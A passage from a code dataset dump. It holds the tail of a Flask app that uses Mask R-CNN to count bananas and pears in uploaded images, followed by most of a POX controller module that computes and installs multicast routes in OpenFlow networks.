detection\n results = model.detect([image], verbose=1)\n\n # Visualize results\n r = results[0] ### the length of this will be the count of items found\n print('the class id of all detected objects as follows')\n print('1: banana, 2: pear')\n print(r['class_ids'], '\\nthere are', len(r['class_ids']), 'fruits detected')\n\n # Modified visualize.py line166, so need to run 'python setup.py install' again\n visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],\n class_names, r['scores'])\n print('executed detect_onsite')\n print('completed detecting: ' + names_chosen)\n banana_count = 0\n pear_count = 0\n for category in r['class_ids']:\n if category == 1:\n banana_count = banana_count + 1\n elif category == 2:\n pear_count = pear_count + 1\n count = {'banana': banana_count, 'pear': pear_count}\n return count\n########################### only accepet jpg file ####################################\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n####################### implement color spalsh effect ########################################\ndef color_splash(image, mask):\n \"\"\"Apply color splash effect.\n image: RGB image [height, width, 3]\n mask: instance segmentation mask [height, width, instance count]\n\n Returns result image.\n \"\"\"\n # Make a grayscale copy of the image. The grayscale copy still\n # has 3 RGB channels, though.\n gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255\n # Copy color pixels from the original color image where mask is set\n if mask.shape[-1] > 0:\n # We're treating all instances as one, so collapse the mask into one layer\n mask = (np.sum(mask, -1, keepdims=True) >= 1)\n splash = np.where(mask, image, gray).astype(np.uint8)\n else:\n splash = gray.astype(np.uint8)\n return splash\n\n\ndef detect_and_color_splash(model):\n # Run model detection and generate the color splash effect\n # Read image\n user_file_names = next(os.walk(UPLOAD_FOLDER))[2]\n names_chosen = random.choice(user_file_names)\n image = skimage.io.imread(os.path.join(UPLOAD_FOLDER, names_chosen))\n # Detect objects\n r = model.detect([image], verbose=1)[0]\n # Color splash\n splash = color_splash(image, r['masks'])\n # # Save output\n skimage.io.imsave('static/images/splash_result.jpg', splash)\n print('executed color splash')\n################################################################\n@app.route('/')\ndef home():\n if request.method == 'GET':\n return render_template('index.html')\n\n return render_template('index.html')\n\n\n@app.route('/UploadDetect', methods=['GET', 'POST'])\ndef upload_file_detect():\n if request.method == 'GET':\n return render_template('upload_detect.html')\n\n if request.method == 'POST':\n f = request.files['file']\n print(request.files)\n if f and allowed_file(f.filename):\n filename = secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'uploaded_image.jpg'))\n return redirect('/detect')\n else:\n print('file type is not correct')\n return render_template('upload_detect.html')\n\n@app.route('/UploadSplash', methods=['GET', 'POST'])\ndef upload_file_splash():\n if request.method == 'GET':\n return render_template('upload_splash.html')\n\n if request.method == 'POST':\n f = request.files['file']\n print(request.files)\n if f and allowed_file(f.filename):\n filename = secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], 'uploaded_image.jpg'))\n return redirect('/splash')\n else:\n print('file type is not correct')\n return render_template('upload_splash.html')\n\n\n@app.route('/detect')\ndef detect():\n count = detect_onsite(model)\n return render_template('result_detect.html', countresult = count)\n\n@app.route('/splash')\ndef splash():\n detect_and_color_splash(model)\n return render_template('result_splash.html')\n'''\nMain function to run Flask server\n'''\nif __name__ == '__main__':\n app.run()\n","sub_path":"samples/pearBanana/app-2class.py","file_name":"app-2class.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"16035100","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright 2014 Alexander Craig\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nA POX module implementation of multicast routing, supported by management of group state using the IGMP manager module.\n\nImplementation adapted from NOX-Classic CastFlow implementation provided by caioviel. Multicast routing records are stored for each \ncombination of multicast group and source address. For each of these records the GroupFlow module will calculate a shortest path tree \nusing Dijkstra's algorithm from the multicast source to all routers in the network (where each edge is weighted according to the number \nof hops from the multicast source). Branches of this tree which correspond to active multicast receivers are installed into the network\nthrough OpenFlow, and the spanning tree is only recalculated when the network topology changes. This should enable rapid changes of \nmulticast group, as there is no need to completely recalculate the multicast tree when new receivers join a group.\n\nThe following command line arguments are supported:\n\n* link_weight_type: Determines the method by which link weights are scaled with link utilization. Supported options are 'linear'\n (link weight scales as a linear function of utilization) or 'exponential' (link weight grows exponentially with increasing utilization).\n Default: linear\n* static_link_weight: Determines the static weight which is applied to all links regardless of utilization.\n Default: 1\n* util_link_weight: Determines the scaling factor by which utilization based link weight will be multiplied. Higher values cause the current\n traffic state to be more heavily weighted in routing (relative to the network topology). Note that setting this to 0 with either link\n weight type will produce shortest cost trees in terms of number of hops only.\n Default: 10\n* flow_replacement_mode: Determines the manner in which replacement of existing flows is triggered. Supported options:\n 'none': Existing flows are never replaced.\n 'periodic': Existing flows are periodically replaced.\n 'cong_threshold': In this mode, flow replacement is triggered by the FlowTracker module reporting congestion on a link traversed by the flow.\n Upon receiving a LinkUtilizationEvent, the GroupFlow module will attempt to replace the largest flows traversing the link until the link is\n brought back under its congestion threshold.\n Default: 'none'\n* flow_replacement_interval: Determines the flow replacement interval in a mode specific fashion (always specified in seconds): \n 'none': Has no effect\n 'periodic': Sets the periodic interval at which flows are replaced.\n 'cong_threshold': Sets the minimum interval that must elapse after flow placement, before the flow can be replaced.\n Default: 10\n\nDepends on openflow.igmp_manager, misc.groupflow_event_tracer (optional)\n\nCreated on July 16, 2013\n\nAuthor: Alexander Craig - alexcraig1@gmail.com\n\"\"\"\n\nfrom collections import defaultdict\nfrom sets import Set\nfrom heapq import heappop, heappush\nimport time\n\n# POX dependencies\nfrom pox.openflow.discovery import Discovery\nfrom pox.core import core\nfrom pox.lib.revent import *\nfrom pox.misc.groupflow_event_tracer import *\nfrom pox.openflow.flow_tracker import *\nfrom pox.lib.util import dpid_to_str\nimport pox.lib.packet as pkt\nfrom pox.lib.packet.igmp import * # Required for various IGMP variable constants\nfrom pox.lib.packet.ethernet import *\nimport pox.openflow.libopenflow_01 as of\nfrom pox.lib.addresses import IPAddr, EthAddr\nfrom pox.lib.recoco import Timer\nimport sys\n\nlog = core.getLogger()\n\n# Constants used to determine which link weighting scheme is used\nLINK_WEIGHT_LINEAR = 1\nLINK_WEIGHT_EXPONENTIAL = 2\n\nSTATIC_LINK_WEIGHT = 1 # Scaling factor for link weight which is statically assigned (implements shortest hop routing if no dynamic link weight is set)\nUTILIZATION_LINK_WEIGHT = 10 # Scaling factor for link weight which is determined by current link utilization\n\n# Default flow replacement interval\nFLOW_REPLACEMENT_INTERVAL_SECONDS = 10\n\n# Constants to determine flow replacement mode\nNO_FLOW_REPLACEMENT = 0\nPERIODIC_FLOW_REPLACEMENT = 1\nCONG_THRESHOLD_FLOW_REPLACEMENT = 2\n\n# Developer constants\n# The below constants enable/configure experimental features which have not yet been integrated into the module API\nENABLE_OUT_OF_ORDER_PACKET_DELIVERY = False\n\nclass MulticastPath(object):\n \"\"\"Manages multicast route calculation and installation for a single pair of multicast group and multicast sender.\"\"\"\n\n def __init__(self, src_ip, src_router_dpid, ingress_port, dst_mcast_address, groupflow_manager, groupflow_trace_event = None):\n self.src_ip = src_ip\n self.ingress_port = ingress_port\n self.src_router_dpid = src_router_dpid\n self.dst_mcast_address = dst_mcast_address\n self.path_tree_map = defaultdict(lambda : None) # self.path_tree_map[router_dpid] = Complete path from receiver router_dpid to src\n self.weighted_topo_graph = []\n self.node_list = [] # List of all managed router dpids\n self.installed_node_list = [] # List of all router dpids with rules currently installed\n self.receivers = [] # Tuples of (router_dpid, port)\n self.groupflow_manager = groupflow_manager\n self.flow_cookie = self.groupflow_manager.get_new_mcast_group_cookie()\n self.calc_path_tree_dijkstras(groupflow_trace_event)\n self._last_flow_replacement_time = None\n self._flow_replacement_timer = None\n\n def calc_path_tree_dijkstras(self, groupflow_trace_event = None):\n \"\"\"Calculates a shortest path tree from the group sender to all network switches, and caches the resulting tree.\n\n Note that this function does not install any flow modifications.\"\"\"\n if not groupflow_trace_event is None:\n groupflow_trace_event.set_tree_calc_start_time(self.dst_mcast_address, self.src_ip)\n self._last_flow_replacement_time = time.time()\n \n self._calc_link_weights()\n \n nodes = set(self.node_list)\n edges = self.weighted_topo_graph\n graph = defaultdict(list)\n for src,dst,cost in edges:\n graph[src].append((cost, dst))\n \n path_tree_map = defaultdict(lambda : None)\n queue, seen = [(0,self.src_router_dpid,())], set()\n while queue:\n (cost,node1,path) = heappop(queue)\n if node1 not in seen:\n seen.add(node1)\n path = (node1, path)\n path_tree_map[node1] = path\n \n for next_cost, node2 in graph.get(node1, ()):\n if node2 not in seen:\n new_path_cost = cost + next_cost\n heappush(queue, (new_path_cost, node2, path))\n \n self.path_tree_map = path_tree_map\n \n log.debug('Calculated shortest path tree for source at router_dpid: ' + dpid_to_str(self.src_router_dpid))\n for node in self.path_tree_map:\n log.debug('Path to Node ' + dpid_to_str(node) + ': ' + str(self.path_tree_map[node]))\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_tree_calc_end_time()\n \n def _calc_link_weights(self):\n \"\"\"Calculates link weights for all links in the network to be used by calc_path_tree_dijkstras().\n\n The cost assigned to each link is based on the link's current utilization (as determined by the FlowTracker\n module), and the exact manner in which utilization is converted to a link wieght is determined by\n groupflow_manager.link_weight_type. Valid options are LINK_WEIGHT_LINEAR and LINK_WEIGHT_EXPONENTIAL. Both options\n include a static weight which is always assigned to all links (determined by groupflow_manager.static_link_weight),\n and a dynamic weight which is based on the current utilization (determined by\n groupflow_manager.utilization_link_weight). Setting groupflow_manager.utilization_link_weight to 0 will always\n results in shortest hop routing.\n \"\"\"\n curr_topo_graph = self.groupflow_manager.topology_graph\n self.node_list = list(self.groupflow_manager.node_set)\n \n weighted_topo_graph = []\n current_util = core.openflow_flow_tracker.get_max_flow_utilization(self.flow_cookie) / core.openflow_flow_tracker.link_max_bw\n log.info('Current utilization of flow ' + str(self.flow_cookie) + ': ' + str(current_util * core.openflow_flow_tracker.link_max_bw) + ' Mbps')\n \n for edge in curr_topo_graph:\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n raw_link_util = core.openflow_flow_tracker.get_link_utilization_normalized(edge[0], output_port);\n link_util_mcast_flow = core.openflow_flow_tracker.get_flow_utilization_normalized(edge[0], output_port, self.flow_cookie)\n \n link_util = max(0, (raw_link_util * (1 - link_util_mcast_flow)))\n \n # link_util = raw_link_util # Uncommenting this line will cause flows to reroute around their own traffic, good for testing\n \n # Current utilization here is doubled as a simple attempt to handle variability in flow rates\n if link_util + (current_util * 2) > 1:\n link_util = 1\n \n link_weight = 1\n \n if self.groupflow_manager.util_link_weight == 0:\n link_weight = self.groupflow_manager.static_link_weight\n else:\n if self.groupflow_manager.link_weight_type == LINK_WEIGHT_LINEAR:\n if link_util >= 1:\n link_weight = sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links()\n else:\n link_weight = min(self.groupflow_manager.static_link_weight + (self.groupflow_manager.util_link_weight * link_util),\n sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links())\n elif self.groupflow_manager.link_weight_type == LINK_WEIGHT_EXPONENTIAL:\n if link_util >= 1:\n link_weight = sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links()\n else:\n link_weight = min(self.groupflow_manager.static_link_weight + (self.groupflow_manager.util_link_weight * ((1 / (1 - link_util)) - 1)),\n sys.float_info.max / core.openflow_flow_tracker.get_num_tracked_links())\n \n log.debug('Router DPID: ' + dpid_to_str(edge[0]) + ' Port: ' + str(output_port) + \n ' TotalUtil: ' + str(raw_link_util) + ' FlowUtil: ' + str(link_util_mcast_flow) + ' OtherFlowUtil: ' + str(link_util) \n + ' Weight: ' + str(link_weight))\n\n weighted_topo_graph.append([edge[0], edge[1], link_weight])\n self.weighted_topo_graph = weighted_topo_graph\n \n log.debug('Calculated link weights for source at router_dpid: ' + dpid_to_str(self.src_router_dpid))\n for edge in self.weighted_topo_graph:\n log.debug(dpid_to_str(edge[0]) + ' -> ' + dpid_to_str(edge[1]) + ' W: ' + str(edge[2]))\n \n def install_openflow_rules(self, groupflow_trace_event = None):\n \"\"\"Selects routes for active receivers from the cached shortest path tree, and installs/removes OpenFlow rules accordingly.\"\"\"\n reception_state = self.groupflow_manager.get_reception_state(self.dst_mcast_address, self.src_ip)\n log.debug('Reception state for ' + str(self.dst_mcast_address) + ': ' + str(reception_state))\n outgoing_rules = defaultdict(lambda : None)\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_route_processing_start_time(self.dst_mcast_address, self.src_ip)\n \n # Calculate the paths for the specific receivers that are currently active from the previously\n # calculated mst\n edges_to_install = []\n calculated_path_router_dpids = []\n for receiver in reception_state:\n if receiver[0] == self.src_router_dpid:\n continue\n if receiver[0] in calculated_path_router_dpids:\n continue\n \n # log.debug('Building path for receiver on router: ' + dpid_to_str(receiver[0]))\n receiver_path = self.path_tree_map[receiver[0]]\n log.debug('Receiver path for receiver ' + str(receiver[0]) + ': ' + str(receiver_path))\n if receiver_path is None:\n log.warn('Path could not be determined for receiver ' + dpid_to_str(receiver[0]) + ' (network is not fully connected)')\n continue\n \n while receiver_path[1]:\n edges_to_install.append((receiver_path[1][0], receiver_path[0]))\n receiver_path = receiver_path[1]\n calculated_path_router_dpids.append(receiver[0])\n \n # Get rid of duplicates in the edge list (must be a more efficient way to do this, find it eventually)\n edges_to_install = list(Set(edges_to_install))\n if not edges_to_install is None:\n # log.info('Installing edges:')\n for edge in edges_to_install:\n log.debug('Installing: ' + str(edge[0]) + ' -> ' + str(edge[1]))\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_route_processing_end_time()\n groupflow_trace_event.set_flow_installation_start_time()\n \n for edge in edges_to_install:\n if edge[0] in outgoing_rules:\n # Add the output action to an existing rule if it has already been generated\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n outgoing_rules[edge[0]].actions.append(of.ofp_action_output(port = output_port))\n #log.debug('ER: Configured router ' + dpid_to_str(edge[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to next router ' + \\\n # dpid_to_str(edge[1]) + ' over port: ' + str(output_port))\n else:\n # Otherwise, generate a new flow mod\n msg = of.ofp_flow_mod()\n msg.hard_timeout = 0\n msg.idle_timeout = 0\n if edge[0] in self.installed_node_list:\n msg.command = of.OFPFC_MODIFY\n else:\n msg.command = of.OFPFC_ADD\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.cookie = self.flow_cookie\n output_port = self.groupflow_manager.adjacency[edge[0]][edge[1]]\n msg.actions.append(of.ofp_action_output(port = output_port))\n outgoing_rules[edge[0]] = msg\n #log.debug('NR: Configured router ' + dpid_to_str(edge[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to next router ' + \\\n # dpid_to_str(edge[1]) + ' over port: ' + str(output_port))\n \n for receiver in reception_state:\n if receiver[0] in outgoing_rules:\n # Add the output action to an existing rule if it has already been generated\n output_port = receiver[1]\n outgoing_rules[receiver[0]].actions.append(of.ofp_action_output(port = output_port))\n #log.debug('ER: Configured router ' + dpid_to_str(receiver[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to network over port: ' + str(output_port))\n else:\n # Otherwise, generate a new flow mod\n msg = of.ofp_flow_mod()\n msg.hard_timeout = 0\n msg.idle_timeout = 0\n if receiver[0] in self.installed_node_list:\n msg.command = of.OFPFC_MODIFY\n else:\n msg.command = of.OFPFC_ADD\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n output_port = receiver[1]\n msg.actions.append(of.ofp_action_output(port = output_port))\n outgoing_rules[receiver[0]] = msg\n #log.debug('NR: Configured router ' + dpid_to_str(receiver[0]) + ' to forward group ' + \\\n # str(self.dst_mcast_address) + ' to network over port: ' + str(output_port))\n \n # Setup empty rules for any router not involved in this path\n for router_dpid in self.node_list:\n if not router_dpid in outgoing_rules and router_dpid in self.installed_node_list:\n msg = of.ofp_flow_mod()\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.command = of.OFPFC_DELETE\n outgoing_rules[router_dpid] = msg\n #log.debug('Removed rule on router ' + dpid_to_str(router_dpid) + ' for group ' + str(self.dst_mcast_address))\n \n for router_dpid in outgoing_rules:\n connection = core.openflow.getConnection(router_dpid)\n if connection is not None:\n connection.send(outgoing_rules[router_dpid])\n if not outgoing_rules[router_dpid].command == of.OFPFC_DELETE:\n self.installed_node_list.append(router_dpid)\n else:\n self.installed_node_list.remove(router_dpid)\n else:\n log.warn('Could not get connection for router: ' + dpid_to_str(router_dpid))\n \n log.debug('New flows installed for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n \n if self.groupflow_manager.flow_replacement_mode == PERIODIC_FLOW_REPLACEMENT and self._flow_replacement_timer is None:\n log.debug('Starting flow replacement timer for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n self._flow_replacement_timer = Timer(self.groupflow_manager.flow_replacement_interval, self.update_flow_placement, recurring=True)\n \n if not groupflow_trace_event is None:\n groupflow_trace_event.set_flow_installation_end_time()\n core.groupflow_event_tracer.archive_trace_event(groupflow_trace_event)\n\n \n def remove_openflow_rules(self):\n \"\"\"Removes all OpenFlow rules associated with this multicast group / sender pair.\n\n This should be used when the group has no active receivers.\"\"\"\n log.info('Removing rules on all routers for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip))\n for router_dpid in self.node_list:\n msg = of.ofp_flow_mod()\n msg.cookie = self.flow_cookie\n msg.match.dl_type = 0x800 # IPV4\n msg.match.nw_dst = self.dst_mcast_address\n msg.match.nw_src = self.src_ip\n msg.match.in_port = None\n msg.command = of.OFPFC_DELETE\n connection = core.openflow.getConnection(router_dpid)\n if connection is not None:\n connection.send(msg)\n else:\n log.warn('Could not get connection for router: ' + dpid_to_str(router_dpid))\n self.installed_node_list = []\n \n if self._flow_replacement_timer is not None:\n self._flow_replacement_timer.cancel()\n self._flow_replacement_timer = None\n \n def update_flow_placement(self, groupflow_trace_event = None):\n \"\"\"Replaces the existing flows by recalculating the cached shortest path tree, and installing new OpenFlow rules.\"\"\"\n self.calc_path_tree_dijkstras(groupflow_trace_event)\n self.install_openflow_rules(groupflow_trace_event)\n log.info('Replaced flows for Group: ' + str(self.dst_mcast_address) + ' Source: ' + str(self.src_ip) + ' FlowCookie: ' + str(self.flow_cookie))\n \n\n\nclass GroupFlowManager(EventMixin):\n \"\"\"The GroupFlowManager implements multicast routing for OpenFlow networks.\"\"\"\n _core_name = \"openflow_groupflow\"\n \n def __init__(self, link_weight_type, static_link_weight, util_link_weight, flow_replacement_mode, flow_replacement_interval):\n # Listen to dependencies\n def startup():\n core.openflow.addListeners(self, priority = 99)\n core.openflow_igmp_manager.addListeners(self, priority = 99)\n core.openflow_flow_tracker.addListeners(self, priority = 99)\n\n self.link_weight_type = link_weight_type\n log.info('Set link weight type: ' + str(self.link_weight_type))\n self.static_link_weight = float(static_link_weight)\n if self.static_link_weight == 0:\n self.static_link_weight = sys.float_info.min\n self.util_link_weight = float(util_link_weight)\n log.info('Set StaticLinkWeight:' + str(self.static_link_weight) + ' UtilLinkWeight:' + str(self.util_link_weight))\n self.flow_replacement_mode = flow_replacement_mode\n self.flow_replacement_interval = flow_replacement_interval\n log.info('Set FlowReplacementMode:' + str(flow_replacement_mode) + ' FlowReplacementInterval:' + str(flow_replacement_interval) + ' seconds')\n \n self.adjacency = defaultdict(lambda : defaultdict(lambda : None))\n self.topology_graph = []\n self.node_set = Set()\n self.multicast_paths = defaultdict(lambda : defaultdict(lambda : None))\n self.multicast_paths_by_flow_cookie = {} # Stores references to the same objects as self.multicast_paths, except this map is keyed by flow_cookie\n self._next_mcast_group_cookie = 54345; # Arbitrary, not set to 1 to avoid conflicts with other modules\n \n # Desired reception state as delivered by the IGMP manager, keyed by the dpid of the router for which\n # the reception state applies\n self.desired_reception_state = defaultdict(lambda : None)\n \n # Setup listeners\n core.call_when_ready(startup, ('openflow', 'openflow_igmp_manager', 'openflow_flow_tracker'))\n \n def get_new_mcast_group_cookie(self):\n \"\"\"Returns a new, unique cookie which should be assigned to a multicast_group / sender pair.\n\n Using a unique cookie per multicast group / sender allows the FlowTracker module to accurately track\n bandwidth utilization on a per-flow basis.\n \"\"\"\n self._next_mcast_group_cookie += 1\n log.debug('Generated new flow cookie: ' + str(self._next_mcast_group_cookie - 1))\n return self._next_mcast_group_cookie - 1\n \n def get_reception_state(self, mcast_group, src_ip):\n \"\"\"Returns locations to which traffic must be routed for the specified multicast address and sender IP.\n\n Returns a list of tuples of the form (router_dpid, output_port).\n \"\"\"\n # log.debug('Calculating reception state for mcast group: ' + str(mcast_group) + ' Source: ' + str(src_ip))\n reception_state = []\n for router_dpid in self.desired_reception_state:\n # log.debug('Considering router: ' + dpid_to_str(router_dpid))\n if mcast_group in self.desired_reception_state[router_dpid]:\n for port in self.desired_reception_state[router_dpid][mcast_group]:\n if not self.desired_reception_state[router_dpid][mcast_group][port]:\n reception_state.append((router_dpid, port))\n # log.debug('Reception from all sources desired on port: ' + str(port))\n elif src_ip in self.desired_reception_state[router_dpid][mcast_group][port]:\n reception_state.append((router_dpid, port))\n # log.debug('Reception from specific source desired on port: ' + str(port))\n else:\n return reception_state\n\n \n def drop_packet(self, packet_in_event):\n \"\"\"Drops the packet represented by the PacketInEvent without any flow table modification\"\"\"\n msg = of.ofp_packet_out()\n msg.data = packet_in_event.ofp\n msg.buffer_id = packet_in_event.ofp.buffer_id\n msg.in_port = packet_in_event.port\n msg.actions = [] # No actions = drop packet\n packet_in_event.connection.send(msg)\n\n def get_topo_debug_str(self):\n debug_str = '\\n===== GroupFlow Learned Topology'\n for edge in self.topology_graph:\n debug_str += '\\n(' + dpid_to_str(edge[0]) + ',' + dpid_to_str(edge[1]) + ')'\n return debug_str + '\\n===== GroupFlow Learned Topology'\n \n def parse_topology_graph(self, adjacency_map):\n \"\"\"Parses an adjacency map into a node and edge graph (which is cached in self.topology_graph and self.node_set).\"\"\"\n new_topo_graph = []\n new_node_list = []\n for router1 in adjacency_map:\n for router2 in adjacency_map[router1]:\n new_topo_graph.append((router1, router2))\n if not router2 in new_node_list:\n new_node_list.append(router2)\n if not router1 in new_node_list:\n new_node_list.append(router1)\n self.topology_graph = new_topo_graph\n self.node_set = Set(new_node_list)\n \n def _handle_PacketIn(self, event):\n \"\"\"Processes PacketIn events to detect multicast sender IPs.\"\"\"\n router_dpid = event.connection.dpid\n if not router_dpid in self.node_set:\n # log.debug('Got packet from unrecognized router.')\n return # Ignore packets from unrecognized routers\n \n igmp_pkt = event.parsed.find(pkt.igmpv3)\n if not igmp_pkt is None:\n return # IGMP packets should be ignored by this module\n \n ipv4_pkt = event.parsed.find(pkt.ipv4)\n if not ipv4_pkt is None:\n # ==== IPv4 Packet ====\n # Check the destination address to see if this is a multicast packet\n if ipv4_pkt.dstip.inNetwork('224.0.0.0/4'):\n # Ignore multicast packets from adjacent routers\n for router_dpid2 in self.adjacency[router_dpid]:\n if self.adjacency[router_dpid][router_dpid2] == event.port:\n return\n \n group_reception = self.get_reception_state(ipv4_pkt.dstip, ipv4_pkt.srcip)\n if group_reception:\n if not self.multicast_paths[ipv4_pkt.dstip][ipv4_pkt.srcip] is None:\n log.debug('Got multicast packet from source which should already be configured Router: ' + dpid_to_str(event.dpid) + ' Port: ' + str(event.port))\n if ENABLE_OUT_OF_ORDER_PACKET_DELIVERY:\n # This may cause OFPBRC_BUFFER_UNKNOWN errors if the controller takes too long to respond\n # Send the packet back to the switch for forwarding\n msg = of.ofp_packet_out()\n msg.data = event.ofp\n msg.buffer_id = event.ofp.buffer_id\n msg.in_port = event.port\n msg.actions = [of.ofp_action_output(port = of.OFPP_TABLE)]\n event.connection.send(msg)\n return\n \n log.info('Got multicast packet from new source. Router: ' + dpid_to_str(event.dpid) + ' Port: ' + str(event.port))\n log.debug('Reception state for this group:')\n \n for receiver in group_reception:\n log.debug('Multicast Receiver: ' + dpid_to_str(receiver[0]) + ':' + str(receiver[1]))\n\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace()\n except:\n pass\n path_setup = MulticastPath(ipv4_pkt.srcip, router_dpid, event.port, ipv4_pkt.dstip, self, groupflow_trace_event)\n self.multicast_paths[ipv4_pkt.dstip][ipv4_pkt.srcip] = path_setup\n self.multicast_paths_by_flow_cookie[path_setup.flow_cookie] = path_setup\n path_setup.install_openflow_rules(groupflow_trace_event)\n \n def _handle_MulticastGroupEvent(self, event):\n \"\"\"Processes MulticastGroupEvents (generated by the IGMPManager module) and adjusts routing as neccesary to fulfill desired reception state\"\"\"\n log.debug(event.debug_str())\n # Save a copy of the old reception state to account for members which left a group\n old_reception_state = None\n if event.router_dpid in self.desired_reception_state:\n old_reception_state = self.desired_reception_state[event.router_dpid]\n \n # Set the new reception state\n self.desired_reception_state[event.router_dpid] = event.desired_reception\n log.info('Set new reception state for router: ' + dpid_to_str(event.router_dpid))\n \n # Build a list of all multicast groups that may be impacted by this change\n mcast_addr_list = []\n removed_mcast_addr_list = []\n for multicast_addr in self.desired_reception_state[event.router_dpid]:\n mcast_addr_list.append(multicast_addr)\n \n if not old_reception_state is None:\n for multicast_addr in old_reception_state:\n # Capture groups which were removed in this event\n if not multicast_addr in mcast_addr_list:\n log.info('Multicast group ' + str(multicast_addr) + ' no longer requires reception')\n removed_mcast_addr_list.append(multicast_addr)\n elif multicast_addr in self.desired_reception_state[event.router_dpid] \\\n and set(old_reception_state[multicast_addr]) == set(self.desired_reception_state[event.router_dpid][multicast_addr]):\n # Prevent processing of groups that did not change\n mcast_addr_list.remove(multicast_addr)\n log.debug('Prevented redundant processing of group: ' + str(multicast_addr))\n \n # Rebuild multicast trees for relevant multicast groups\n log.debug('Recalculating paths due to new reception state change')\n for multicast_addr in mcast_addr_list:\n if multicast_addr in self.multicast_paths:\n log.debug('Recalculating paths for group ' + str(multicast_addr))\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace(event.igmp_trace_event)\n except:\n pass\n for source in self.multicast_paths[multicast_addr]:\n log.info('Recalculating paths for group ' + str(multicast_addr) + ' Source: ' + str(source))\n self.multicast_paths[multicast_addr][source].install_openflow_rules(groupflow_trace_event)\n else:\n log.debug('No existing sources for group ' + str(multicast_addr))\n \n for multicast_addr in removed_mcast_addr_list:\n if multicast_addr in self.multicast_paths:\n sources_to_remove = []\n for source in self.multicast_paths[multicast_addr]:\n log.info('Removing flows for group ' + str(multicast_addr) + ' Source: ' + str(source))\n self.multicast_paths[multicast_addr][source].remove_openflow_rules()\n del self.multicast_paths_by_flow_cookie[self.multicast_paths[multicast_addr][source].flow_cookie]\n sources_to_remove.append(source)\n \n for source in sources_to_remove:\n del self.multicast_paths[multicast_addr][source]\n else:\n log.info('Removed multicast group ' + str(multicast_addr) + ' has no known paths')\n \n def _handle_MulticastTopoEvent(self, event):\n \"\"\"Processes MulticastTopoEvents (generated by the IGMPManager module) and adjusts routing as neccesary to account for topology changes\n \n Note: In the current implementation, this recalculates all multicast routes.\n \"\"\"\n # log.info(event.debug_str())\n self.adjacency = event.adjacency_map\n self.parse_topology_graph(event.adjacency_map)\n # log.info(self.get_topo_debug_str())\n\n if self.multicast_paths:\n log.warn('Multicast topology changed, recalculating all paths.')\n for multicast_addr in self.multicast_paths:\n for source in self.multicast_paths[multicast_addr]:\n groupflow_trace_event = None\n try:\n groupflow_trace_event = core.groupflow_event_tracer.init_groupflow_event_trace()\n except:\n pass\n self.multicast_paths[multicast_addr][source].update_flow_placement(groupflow_trace_event)\n \n def _handle_LinkUtilizationEvent(self, event):\n \"\"\"Processes LinkUtilizationEvents (generated by the FlowTracker module), and replaces flows that traverse the specified link\"\"\"\n \n if event.link_utilization >= core.openflow_flow_tracker.link_max_bw:\n log.debug('Link Fully Utilized! Switch:' + dpid_to_str(event.router_dpid) + ' Port:' + str(event.output_port))\n \n # Ignore the event if congestion threshold based flow replacement is not enabled\n if self.flow_replacement_mode != CONG_THRESHOLD_FLOW_REPLACEMENT:\n return\n \n log.debug('Got LinkUtilEvent - Switch: ' + dpid_to_str(event.router_dpid) + ' Port: ' + str(event.output_port) + '\\n\\tUtil: ' + str(event.link_utilization))\n \n replacement_time = time.time()\n \n # 1) Determine the amount of utilization that should be replaced to bring the link back under the congestion threshold\n replacement_utilization = event.link_utilization - event.cong_threshold\n if replacement_utilization < 0:\n log.warn('LinkUtilizationEvent specified negative replacement utilization.')\n return\n log.debug('Attempting replacement of ' + str(replacement_utilization) + ' Mbps of flows')\n \n # 2) Build a list of the flows managed by this module that are contributing to congestion, sorted by decreasing utilization\n replacement_flows = []\n for event_flow_cookie in event.flow_map:\n if event_flow_cookie in self.multicast_paths_by_flow_cookie:\n replacement_flows.append((event_flow_cookie, event.flow_map[event_flow_cookie]))\n replacement_flows.sort(key = lambda flow: flow[1])\n log.debug('Candidates for flow replacement: ' + str(replacement_flows))\n \n # 3) Replace flows until all candidates have been processed, or the targetted replacement utilization is reached\n # Note that flows which have been recently 